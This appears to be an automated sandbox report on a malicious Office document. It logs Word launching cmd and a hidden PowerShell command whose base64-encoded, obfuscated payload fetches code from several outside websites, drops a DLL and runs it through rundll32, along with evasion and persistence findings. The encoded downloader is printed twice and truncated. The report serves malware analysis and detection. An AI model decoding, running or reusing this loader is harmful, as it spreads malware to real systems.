ABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF002822CC pushad ; retf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FF00282350 pushad ; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uuiJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2516Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2092815275.0000000000274000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
